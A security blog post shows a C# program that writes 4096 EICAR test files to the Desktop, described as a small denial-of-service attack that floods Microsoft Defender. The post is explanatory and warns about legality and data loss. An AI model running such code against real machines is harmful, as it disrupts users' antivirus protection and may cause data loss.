ethical.blue Magazine

// Cybersecurity clarified.

Flooding Microsoft Defender Antivirus with EICAR Testfile

2022-07-19   Dawid Farbaniec
...
Eicar file is a harmless .com program for MS-DOS. It is used to test the anti-virus software. EICAR stands for European Institute for Computer Anti-Virus Research. This institute is an organization working on the development of techniques for detecting and fighting not only computer viruses, but also malicious software. There born idea to create a file that would be recognized as a computer virus, but would not perform any malicious activities. This type of file was found to be of great help in testing antivirus software. With the help of this small file, each user can check the operation of the installed antivirus.

The Eicar file size is 68 bytes. In order to reduce the possibility of using this file for malicious purposes, a limit has been introduced that limits the number of bytes to a maximum of 128.

Imagine that without this limitation, you insert the EICAR test file (68 bytes) to the legitimate software and the antivirus deletes it due to EICAR code detection.

But this does not exclude the improper or malicious use of EICAR test file.

This text contains analysis of small Denial of Service attack on Microsoft Defender Antivirus.

The experiment was to write a program (for example in C#.NET) that would create a lot of EICAR anti-malware test files in specified directory on Desktop.

EICAR Launcher in C#.NET

Program code for this experiment is provided below.

// See https://aka.ms/new-console-template for more information

string payload = @"X5O!P%@AP[4\PZX54(P^)7CC)7}$" +
    "EICAR-STANDARD-ANT" + (char)0x49 +
    "VIRUS-TEST-FILE!$H+H*";

string path = Path.Combine(
    Environment.GetFolderPath(
    Environment.SpecialFolder.Desktop),
    Guid.NewGuid().ToString().Replace("-", "0"));

if (Directory.Exists(path) == false)
{
    Directory.CreateDirectory(path);
}

for(int i = 0; i < 4096; i++)
{
    File.WriteAllText(Path.Combine(path, $"{i}.com"), payload);
}

Console.WriteLine("ethical.blue");

This C# console application tries to create 4096 test files inside folder placed on Desktop.

Execution of this code will make a small Denial of Service attack on Microsoft Defender Antivirus. The video below is showing that antivirus software GUI is not responding.



Probably the user needs to wait for the Microsoft Defender to stop blinking. It will blink around 4096 times.

One can classify this program as computer joke. Computer jokes are connected with the VX scene and computer science lessons in schools. Some jokes are harmless and really funny. The other can be destructive or very irritating.

Notice that flooded Microsoft Defender Antivirus may cause data loss or other damage.

Check your local law and stay ethical. One can be punished for disrupting IT systems!

Bibliography

https://www.eicar.org/download-anti-malware-testfile/ [access: 2022-07-19]